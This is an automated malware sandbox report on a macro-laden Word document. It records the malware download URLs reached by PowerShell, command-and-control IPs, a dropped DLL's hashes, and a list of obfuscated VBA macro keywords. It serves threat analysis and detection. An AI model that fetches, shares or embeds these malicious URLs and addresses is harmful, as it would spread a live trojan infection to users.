http://giannaspsychicstudio.com/cgi-bin/PP/	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp:	powershell.exe, 00000005.00000002.2103707252.0000000000304000.00000004.00000020.sdmp	false		high
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.2103707252.0000000000304000.00000004.00000020.sdmp	false		high
http://computername/printers/printername/.printer	rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://www.%s.comPA	powershell.exe, 00000005.00000002.2104803337.0000000002340000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111873001.0000000002CF0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://vstsample.com/wp-includes/7eXeI/	powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
152.170.79.100	unknown	Argentina		10318	TelecomArgentinaSAAR	true
35.208.69.64	unknown	United States		19527	GOOGLE-2US	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339167
Start date:	13.01.2021
Start time:	16:30:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	info_2020_NJY_31940448.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@26/7@1/2
EGA Information:	Successful, ratio: 88.9%
HDC Information:	Successful, ratio: 39.8% (good quality ratio 38.8%) Quality average: 82% Quality standard deviation: 24.1%
HCA Information:	Successful, ratio: 88% Number of executed functions: 167 Number of non-executed functions: 239
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 2300 because it is empty Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:31:44	API Interceptor	1x Sleep call for process: msg.exe modified
16:31:45	API Interceptor	33x Sleep call for process: powershell.exe modified
16:31:49	API Interceptor	892x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
152.170.79.100	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100/jne6snt/m6myiohmse/
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100/gsyuaw2no20y/
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100/2w9radk/e1bqg93t32/bfbkkxnxm/kzpgfx0srz2azra2z6/wtvvr/zuhrx/
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100/udiwy/9lqzybri7w/n3qkg5seewustvns68/l36c10de4srgz133y/
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100/f5hvsm8p45k9/r0hin/g4fm3hzyqd5c/
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100/x6g2gr/bchg5i/1dw1veojm5/wx1zsm5gbt71xbtih/gqcr5rzmurhr33/
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100/g66ezlsi59l2qh9tcn/ydgp2y3srh2m5hj6/xkq9/wstqsdd/xpmc9zuidrre/
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100/8wjtai/6101dxx/4ggv7sw145lrki/
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100/7gfh58w8tuftcw/
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100/76ccih3j36ds48gflq/1agrdm9fi2y0wnk/3huzz5wj9w7/
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100/dwap/ulw9qv3rb7tn3pfmcvj/xibwt6769jdvwhte/zsns1d90vaps/f6yatsbh/
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100/hmjmchef7iewj2uvzf/9pltlpfikujmwtp/e6oaz9n/7m756y/bxs78/
	DAT.doc	Get hash	malicious	Browse	152.170.79.100/al700npvtnac1sp/hyv2ljkpgl5er/ftzaj/82949dvglj88n9/kr054l3td4qgcn0/zer9t3m/
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	152.170.79.100/9h5mkq4rscmn4p5/5i03xqzios0rjfom1p/7ryi6q8v0/iljhnekck1dpk9ng/0umxys8m7lmuc090/jj1uo/
	M3816067.doc	Get hash	malicious	Browse	152.170.79.100/jefmqa7pgn6/a7zeb1l6ir8p/iuii6qu/7x9123680/qwimc/kzg68jfg4cm59iv1/
	messaggio 2912.doc	Get hash	malicious	Browse	152.170.79.100/ldptrzs0lv336pjtc/s28dymelc06393/
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	152.170.79.100/bz77n5i0/aajfq5b2yw7yw59kt33/0ghoxzznyfa8bik7hm1/yiyb7xv8gihti8i/uqf8mgk7iy/
	Documento-2912-122020.doc	Get hash	malicious	Browse	152.170.79.100/iu4g99cxf8oc/
	Documento_I_2612.doc	Get hash	malicious	Browse	152.170.79.100/ipjai1r8tvftp/t2vqr6k1oq2jb2z38/f38ne62mhsuf3mdo/a1z9a6ur8zq6rvcxry/
	Archivo-29.doc	Get hash	malicious	Browse	152.170.79.100/doqyotvh2su6/gilkt2/qw7ipzh4umgoxfdc4gu/4alfk7j/m1en5ykrvqhpj/
35.208.69.64	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	allcannabismeds.com/unraid-map/ZZm6/
	Archivo-29.doc	Get hash	malicious	Browse	allcannabismeds.com/unraid-map/ZZm6/
	ARCHIVOFile-2020-IM-65448896.doc	Get hash	malicious	Browse	allcannabismeds.com/unraid-map/ZZm6/
	ARCH.doc	Get hash	malicious	Browse	allcannabismeds.com/unraid-map/ZZm6/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
allcannabismeds.com	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	35.208.69.64
	Archivo-29.doc	Get hash	malicious	Browse	35.208.69.64
	ARCHIVOFile-2020-IM-65448896.doc	Get hash	malicious	Browse	35.208.69.64
	ARCH.doc	Get hash	malicious	Browse	35.208.69.64

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-2US	PO#218740.exe	Get hash	malicious	Browse	35.208.174.213
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	35.214.23.27
	Consignment Details.exe	Get hash	malicious	Browse	35.208.179.96
	S4P1JiBZIZxvtFR.exe	Get hash	malicious	Browse	35.214.203.1
	Archivo_29_48214503.doc	Get hash	malicious	Browse	35.214.169.246
	info.doc	Get hash	malicious	Browse	35.208.84.24
	Adjunto 29 886_473411.doc	Get hash	malicious	Browse	35.209.78.196
	Informacion_29.doc	Get hash	malicious	Browse	35.214.169.246
	Informacion_29.doc	Get hash	malicious	Browse	35.209.78.196
	form.doc	Get hash	malicious	Browse	35.214.199.246
	Nuevo pedido.exe	Get hash	malicious	Browse	35.209.33.122
	Info_122020.doc	Get hash	malicious	Browse	35.208.84.24
	84-2020-98-6493170.doc	Get hash	malicious	Browse	35.208.104.82
	rib.exe	Get hash	malicious	Browse	35.209.110.77
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	35.208.69.64
	Adjunto.doc	Get hash	malicious	Browse	35.214.159.46
	Messaggio-3012-2020.doc	Get hash	malicious	Browse	35.214.159.46
	Documento-2912-122020.doc	Get hash	malicious	Browse	35.208.84.24
	Documento_I_2612.doc	Get hash	malicious	Browse	35.208.84.24
	Archivo-29.doc	Get hash	malicious	Browse	35.208.69.64
TelecomArgentinaSAAR	info.doc	Get hash	malicious	Browse	190.247.139.101
	Informacion_29.doc	Get hash	malicious	Browse	190.247.139.101
	i	Get hash	malicious	Browse	181.170.3.37
	l25m9JjVcwM.dll	Get hash	malicious	Browse	152.170.79.100
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	152.170.79.100
	1923620_YY-5094713.doc	Get hash	malicious	Browse	152.170.79.100
	Info_122020.doc	Get hash	malicious	Browse	152.170.79.100
	FILE 20201230 XC25584.doc	Get hash	malicious	Browse	152.170.79.100
	ARCHIVOFile.doc	Get hash	malicious	Browse	190.247.139.101
	Doc 2912 75513.doc	Get hash	malicious	Browse	190.247.139.101
	79685175.doc	Get hash	malicious	Browse	190.247.139.101
	DATI 2020.doc	Get hash	malicious	Browse	190.247.139.101
	7mB0FoVcSn.exe	Get hash	malicious	Browse	200.114.142.40
	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse	152.170.79.100
	ARC_20201230_493289.doc	Get hash	malicious	Browse	152.170.79.100
	vpzvfqdt.dll	Get hash	malicious	Browse	152.170.79.100
	LIST_2020_12_30_45584.doc	Get hash	malicious	Browse	152.170.79.100
	Adjunto.doc	Get hash	malicious	Browse	152.170.79.100
	PO#634493 301220.doc	Get hash	malicious	Browse	152.170.79.100
	nrJGslwTeN.doc	Get hash	malicious	Browse	152.170.79.100

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll	rep_2020_12_29_N918980.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07B73A5-D643-47FF-B622-0CF30ED55516}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.4337069393458535
Encrypted:	false
SSDEEP:	3:M1YK+Q3WUcRt2UL/Q3WUcRt2mX1YK+Q3WUcRt2v:MyK+PUcRD/PUcRAK+PUcRS
MD5:	3F41D10BF9F9AF03A04023D8E8049989
SHA1:	3986F88F1BC337C32825E1E03453ABBE36B8FCD4
SHA-256:	FAC7D2875B651552EBC9DFBAF39084E0741D33DE13470AFAFA67779EA7F8ABAC
SHA-512:	52E6B5FAAC8731D4DBF579666C5A6E72906DE8D2AE3FCE70E86A381A75CEC69591009E2E45EDA2A821A85B82D09B0EF06ACCC0EA062ED1A857E7A02F5486C434
Malicious:	false
Preview:	[doc]..info_2020_NJY_31940448.LNK=0..info_2020_NJY_31940448.LNK=0..[doc]..info_2020_NJY_31940448.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\info_2020_NJY_31940448.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 13 23:31:41 2021, length=163328, window=hide
Category:	dropped
Size (bytes):	2148
Entropy (8bit):	4.55005851897808
Encrypted:	false
SSDEEP:	24:86H/XTm6GreVPe4GDv3qJdM7dD26H/XTm6GreVPe4GDv3qJdM7dV:86H/XTFGqFxJQh26H/XTFGqFxJQ/
MD5:	B40F3772B12E7A1C991296DE6EAA34D5
SHA1:	6DE879D4890CB03D3FAD473FF7BACA7089FD1D52
SHA-256:	568D6E386FB7F4D117EB76D677B91F07D9A5F555046FA95ED92F2002EB91A0A5
SHA-512:	5C441768DE8B4DCA1A7A5CE8E0D8A8DDF9B7BFC7BC71235F4AEB95F39788C8CCEE835526F1BD1E95464881EC1AD7F534C4D45B5C46F68BE78DEACAA280EA6260
Malicious:	false
Preview:	L..................F.... ....%...{...%...{..........~...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2..~...R.. .INFO_2~1.DOC..b.......Q.y.Q.y...8.....................i.n.f.o._.2.0.2.0._.N.J.Y._.3.1.9.4.0.4.4.8...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\124406\Users.user\Desktop\info_2020_NJY_31940448.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.f.o._.2.0.2.0._.N.J.Y._.3.1.9.4.0.4.4.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......124406....

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJ17GIRPUSXWYYEETPX6.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.588936232295481
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo7z8hQCsMqZqvsEHyqvJCworpzv1YyHYf8OZlUVVIu:cywo7z8yMHnorpzvaf8OcIu
MD5:	6E003B978C8532648584BE98AC76BBCC
SHA1:	A9382D50E314C182CD968195BD87C74825F75CFC
SHA-256:	E0B2EAEC1DFAF37935F05D59B56FC6213799EA9AFE2C3546A5CF6028434E2A4F
SHA-512:	F34247F519F052DD5966CC5182FD6F536250EEA6A838CCA4A2C62A56F6D0B28367A052C66A7B31C8558E7B7998DA1CCC59490EC18786B4EB96677B91A67A3886
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$fo_2020_NJY_31940448.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433664
Entropy (8bit):	7.136814209859121
Encrypted:	false
SSDEEP:	12288:snzOTW1Ig1hxgsjtuEiJ+F9kuwL/1ZBuK20DcUX3XSP9m:eEW1SEiUFZwLdZxDcUXSA
MD5:	759F11DE546F75EC1B576ED031C7A1DC
SHA1:	A727EBFC32B3C8C7B1FE073F009C53D49FAE6F72
SHA-256:	BBB9C1B98EC307A5E84095CF491F7475964A698C90B48A9D43490A05B6BA0A79
SHA-512:	73C0609A7614505CF45DC98076194D1838D71465BAA694D8EFB7BC25E63C9C42A6A2447CDD25731CB4DD141CB467CD658461A01FCA0B2DD19B0B4FA9842EE88D
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 67%, Browse Antivirus: ReversingLabs, Detection: 86%
Joe Sandbox View:	Filename: rep_2020_12_29_N918980.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B........................=...........M.......M.......M...................9.............................z.............Rich....................PE..L......_...........!.................<....... ......................................................................`...P.......P................................%..<...T...............................@............ ..<............................text...c........................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc...%.......&...x..............@..B........................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: ADP Rubber Gorgeous Plastic Towels Buckinghamshire hard drive backing up orchid blue functionalities, Author: Clia Petit, Template: Normal.dotm, Last Saved By: Elisa Leclercq, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 29 13:35:00 2020, Last Saved Time/Date: Tue Dec 29 13:36:00 2020, Number of Pages: 1, Number of Words: 2202, Number of Characters: 12554, Security: 8
Entropy (8bit):	6.679523117725541
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	info_2020_NJY_31940448.doc
File size:	162000
MD5:	e99693721af4330b2f4f0e4ca39f74df
SHA1:	8d5141493dc9e88dd82f55ebbc9c538764127887
SHA256:	c081588672d7e47686d25c4e55de905404749c4ab80a8ba47eb66ceb77c4bc3e
SHA512:	09883a7d81b178ae0d66cba2049569c393cb58902b58f7086851899280a05cf4476132674f4f4d22f15d9cdbf12b3cfc81b6eb967d1c20dc48056a0862062d70
SSDEEP:	3072:b9ufstRUUKSns8T00JSHUgteMJ8qMD7gqtmO:b9ufsfgIf0pLqtmO
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "info_2020_NJY_31940448.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	ADP Rubber Gorgeous Plastic Towels Buckinghamshire hard drive backing up orchid blue functionalities
Author:	Clia Petit
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Elisa Leclercq
Revion Number:	1
Total Edit Time:	0
Create Time:	2020-12-29 13:35:00
Last Saved Time:	2020-12-29 13:36:00
Number of Pages:	1
Number of Words:	2202
Number of Characters:	12554
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	1252
Number of Lines:	104
Number of Paragraphs:	29
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Bt08uhxu1tnhy1, Stream Size: 701

General
Stream Path:	Macros/VBA/Bt08uhxu1tnhy1
VBA File Name:	Bt08uhxu1tnhy1
Stream Size:	701
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . S * c { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 53 2a 63 7b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Bt08uhxu1tnhy1"`

VBA File Name: Xhlj9irufb65_wekzf, Stream Size: 14399

General
Stream Path:	Macros/VBA/Xhlj9irufb65_wekzf
VBA File Name:	Xhlj9irufb65_wekzf
Stream Size:	14399
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . S * . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 fc 0a 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 03 0b 00 00 a7 29 00 00 00 00 00 00 01 00 00 00 53 2a 86 7e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
pKryCIHFC
#jKkUJJZ,
"O:\gtNTBHAA\pRTARkP\omJGJZDcR.TSCsY"
VSmdWBCHE
#IyJitF,
Access
Len(mKbjhqs))
qQuwLC
oMoXwHAi:
KcYzD()
JpnbIUF:
"F:\emayA\cEXRoDjH\VwIACIE.cAhxFlQk"
iNgaE:
Resume
zDLxpKAFE
#nBVGMJ,
XUiHBHHUH()
#DLbwIFKRv,
VGYhDjxf
FELuBTD
nTckscaDq
"F:\JJhGoHJAy\mhYgHAECB\ScIqGCAp.sgqtGoGFB"
qQuwLC:
"F:\MIXPEQq\xrgAtKF\wbeXEF.fMufiCa"
zaZqi
"O:\NCeDGUAx\liGyAIZj\lUyiD.VfSxEM"
HXWoFCJP()
#gGHPnUA
aMSHGI:
erxovx
GEdfI()
abJXtUnJ
FreeFile
LOF(intGend)
vSgqJI
"F:\bdvnDGG\YcExI\ktRsYELAd.fmxbB"
#HHIaF
#FELuBTD,
#jKkUJJZ
XRvZBDBD
VSmdWBCHE:
#abJXtUnJ
OuPbAWEJB
"F:\tzCMq\XMchB\YUPCDfDKL.EffNJq"
"F:\rRIMGI\pwZWJ\AvgVBxG.OaxnnLJb"
OkxlX
#yhCeYdDx
LveTGO
"O:\zDxufIC\iCExC\ZRtuVA.YMVmJ"
zDLxpKAFE:
TOmTI
DtPcJVH:
HNtcACoR()
VWDNpuI()
yhCeYdDx
snahbsd
"O:\xfHgsuZ\OuWcHBRFs\aVDcAfBmF.wxMQaJA"
#HHIaF,
"F:\KzjhHR\fTZqG\WLFeZHJ.RQtHHgTHi"
ReDim
KcYzD
BaaeH:
jKkUJJZ
VWDNpuI
#GvYvntR,
#zaZqi
#pYTRxECC,
DCGxZIHE
DtPcJVH
DCGxZIHE()
"O:\vzest\bkKRAHG\viWaCHFyl.borAIDhH"
#pYTRxECC
nBVGMJ
"O:\aIUpFwC\nTpvYbID\cOpRCH.yenkEdEBG"
#FRpvMrG,
PFNPd
"O:\ZGlzCsC\TtOjBxE\gAFGG.ByczYWAGo"
"O:\skwqjIHSw\BGDBEtNI\SVgGCDCe.oeVOIAwo"
jLIIJFE
#yhCeYdDx,
"F:\UkqzBHD\AfilMCw\FaEXXAH.VJBQHBwD"
GvYvntR
OkxlX:
OuPbAWEJB:
"O:\OoAuHBF\TrVff\lRegJKh.zDCEsFDJE"
HXWoFCJP
TOmTI()
"F:\BokkBJR\JVqtTl\wBdFDGCm.csxtJBIHA"
"F:\yhIgJCIMF\qsJDB\PptZC.VCOUrPxF"
#GigmCE
Binary
uwrli
"O:\QYYEIdD\lneIGGHdk\tPJGEIe.xXBLI"
QrZrL:
DLbwIFKRv
"F:\CmcVFs\XishGzBCo\hcyLYIRH.wmCZaBADB"
XDAaIBnI:
"F:\LvKnA\BOtUEZATF\XZQseKaFA.wNmzM"
jLIIJFE()
#ovskCI,
pYTRxECC
HHIaF
QrZrL
iNgaE
#FmdzUop
uwrli:
FRpvMrG
LveTGO()
#FmdzUop,
oMoXwHAi
JpnbIUF
Integer
pKryCIHFC()
uqjqkyHX
GEdfI
ovskCI
"O:\VoJkkBWBC\NcgoF\KcMVOEFe.igOXKnIU"
BaaeH
gGHPnUA
sIjWJBH
"O:\rueRG\VzWpbFH\IjzjDqRCA.NfKzekAB"
#FELuBTD
YVAKAT()
"F:\SVdfFCU\nnqUrp\YWmSNHII.kFjgBgDk"
Error
YVAKAT
HNtcACoR
aMSHGI
#CMVnWpNGG,
#nBVGMJ
Attribute
KnLfUEp()
Mid(mKbjhqs,
erxovx()
OstReD:
Close
uqjqkyHX()
FmdzUop
"F:\AlLTF\KjklIF\ZbOCaDfmF.zRWqJ"
OstReD
#DLbwIFKRv
VB_Name
#ovskCI
"O:\hTNkC\vnsiEILT\lOvmX.DAaIToDF"
KnLfUEp
IyJitF
"O:\uYQKM\KtKdHCsGD\lkgPV.CtEPFIa"
Function
"O:\CSYaI\BeKGII\ISlAUHBA.hUrieDEBA"
#GigmCE,
CMVnWpNGG
#CMVnWpNGG
#abJXtUnJ,
#FRpvMrG
#VGYhDjxf,
XUiHBHHUH
"F:\KrczWMd\cxBwEA\spjtC.VvknDGZ"
nTckscaDq()
"O:\vzKFL\xTplfDEO\UzdPBJhtk.FxjwCGqT"
"F:\KqqRCCD\OxxrCn\eQUMRH.ZdxMJ"
XDAaIBnI
WvseC:
vSgqJI:
PFNPd()
